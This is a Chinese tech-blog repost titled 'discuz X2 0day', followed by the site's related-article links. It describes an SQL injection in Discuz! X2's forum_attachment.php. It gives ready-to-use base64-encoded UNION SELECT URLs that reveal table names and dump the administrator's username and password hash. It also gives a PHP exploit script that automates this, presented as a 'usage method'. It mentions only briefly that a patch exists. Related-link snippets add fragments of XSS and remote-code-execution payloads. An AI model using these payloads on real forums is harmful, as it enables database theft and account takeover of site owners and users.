discuz X2 0day

最新推荐文章于 2024-04-22 12:41:15 发布
最新推荐文章于 2024-04-22 12:41:15 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: table module access sql database schema
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/7367686
版权


http://hi.baidu.com/bigideaer/blog/item/c2868c26c8ca1e4e4ec22615.html


核心提示:文件:source\module\forum\forum_attachment.php

漏洞名称:Discuz! X2 SQL注射漏洞

if(!defined(‘IN_DISCUZ’)) {exit(‘Access Denied’);}define(‘NOROBOT’, TRUE);@list($_G[...

文件:source\module\forum\forum_attachment.php

漏洞名称:Discuz! X2 SQL注射漏洞

if(!defined(‘IN_DISCUZ’)) {
exit(‘Access Denied’);
}
define(‘NOROBOT’, TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode(‘|’, base64_decode($_G['gp_aid']));

if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first(“SELECT pid, tid FROM “.DB::table(‘forum_attachment’).” WHERE aid=’$_G[gp_aid]‘”))) {
dheader(‘location: forum.php?mod=redirect&goto=findpost&pid=’.$attach['pid'].’&ptid=’.$attach['tid']);
}

变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。

http://www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZ

WN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJM

RVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9

OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
转向后网址

http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

暴出表名 pre_common_admincp_member

实际查询为:

$x=”1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|x|x|x”;
//die (urlencode(base64_encode($x)));

利用方法:

DZ X2直接暴管理账号密码

http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

假如利用不成功说明不是默认前缀
可以用

http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

暴前缀 不过一般都没人改.

补充:

官方已经发布补丁 已经把forum_attachment.php文件修复了

$_G['gp_aid']增加了一次daddslashes自定义函数的过滤然后$aid = intval($_G['gp_aid']);一下.



<?php

echo "Discuz! X2.0  0day EXP\n";
echo "By:Steeltiger \n";
echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo "Start\n";
$exp = base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where  username like '".$argv[2]."|x|y");
$url = "forum.php?mod=attachment&findpost=ss&aid=";
file_get_contents($argv[1].$url.$exp);
echo "End\n";
}
?>


7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
discuz2.0 0day
02-26
discuz2.0 0day
DiscuzX2注入漏洞及XSS漏洞的利用
harryxlb的专栏
11-17 4915
注射漏洞详细说明: 文件:source\module\forum\forum_attachment.php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } define('NOROBOT', TRUE); @list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'],
Discuz! X2.0 0day EXP
收集盒 Book box
07-05 633
echo "Discuz! X2.0 0day EXP\n";echo "By:Steeltiger \n";echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";if(!empty($argv[1]) &
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
discuz x2模板
02-19
discuz x2模板
Discuz X2 网盘插件
02-08
Discuz X2 网盘插件。要求不高,很实用的插件。
discuz_X2文档
08-29
discuz_X2文档,可以参考一下哦。
Discuz_X2
02-05
Discuz_X2
discuz xss 0day利用方法
cnbird's blog
01-18 1231
discuz xss 0day利用方法
discuzx3.1
02-19
Crossday Discuz! Board(以下简称 Discuz!,中国国家版权局著作权登记号 2008SR11708 )是康盛创想(北京)科技有限公司(英文简称Comsenz)推出的一套通用的社区论坛软件系 统。作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 产品,无论在功能、 稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位,是全球成熟度最高、 覆盖率最大的论坛软件系统之一。
(转)Discuz! X2.0 SQL注入漏洞 EXP
weixin_34092370的博客
06-29 312
DZ2.0直接暴管理账号密码(默认前缀的情况下) /forum.php?mod=p_w_upload&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd 29yZCkgZnJv...
Discuz X3.2UC漏洞直接拿shell论坛创始人无视验证码爆破
weixin_40966980的博客
01-03 2万+
这里有个验证码的地址,为:http://localhost/uc_server/admin.php?m=seccode&seccodeauth=07d4kVIZ%2Fj5pecd%2Bv7%2FuE0zfvj%2FKRIrF3pmAd%2BupYhm4GT4&1104676922 验证码一直是 cccc 应该是每个ip第一次访问的话都是这个,所以可以用来爆破
dz论坛Discuz_X3.4最新网站漏洞
网站安全专家
07-11 4万+
近期我们sinesafe安全部门审计discuz最新版的时候发现配置文件写入导致代码执行的问题。cms安装的时候一般会分为几个步骤去进行,其中有对配置文件config进行写入的步骤,当写入的时候未严格限制传入的参数就存在代码执行问题。源码信息:Discuz_X3.4_GIT_SC_UTF8问题文件: \upload\install\index.php漏洞类型:配置文件写入导致代码执行站点地址:ht...
Discuz!所有版本通杀 存储型XSS 0day
hudongge的专栏
10-23 1940
发贴时勾选源码, 鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的把上面的alert(/DZ-XSS-0DAY/)换成 [email][url][img]http://www.i0day.comonmouseover=eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112
Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
oceanark的博客
07-13 2608
----------- 首先膜拜大牛的共享精神,我淫比较懒试了几个站都没成功就不弄了,但有人说成功了,不知道是PR问题还是补丁了   正文:前面省略一万+字。。。。 利用方法 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),
SQL之CASE WHEN用法详解
weixin_42672802的博客
04-18 247
SQL之CASE WHEN用法详解
SQL Server重置自增序列初始值
u010466666的专栏
04-18 305
问题描述:数据库迁移后序列值没有正常迁移,导致数据插入失败。1、查询当前数据库数据自增序列最大值。2、修改自增序列值为表中最大值。为第一步查询的实际数值。
探秘数据库中间件:ProxySQL与MaxScale的优势与劣势
最新发布
todoitbo的博客
04-22 1070
本文将深入探讨两个流行的数据库负载均衡中间件ProxySQL和MaxScale的功能、特点以及适用场景。我们将比较两者的优劣势,并提供选择和配置的建议,帮助读者了解如何在自己的数据库架构中选择合适的解决方案。
linux下载DISCUZ
04-16
DISCUZ是一款开源的论坛程序,可以在Linux系统上进行下载和安装。以下是下载DISCUZ的步骤: 1. 首先,你需要在Linux系统上安装一个Web服务器(如Apache、Nginx等)和数据库服务器(如MySQL、MariaDB等)。你可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值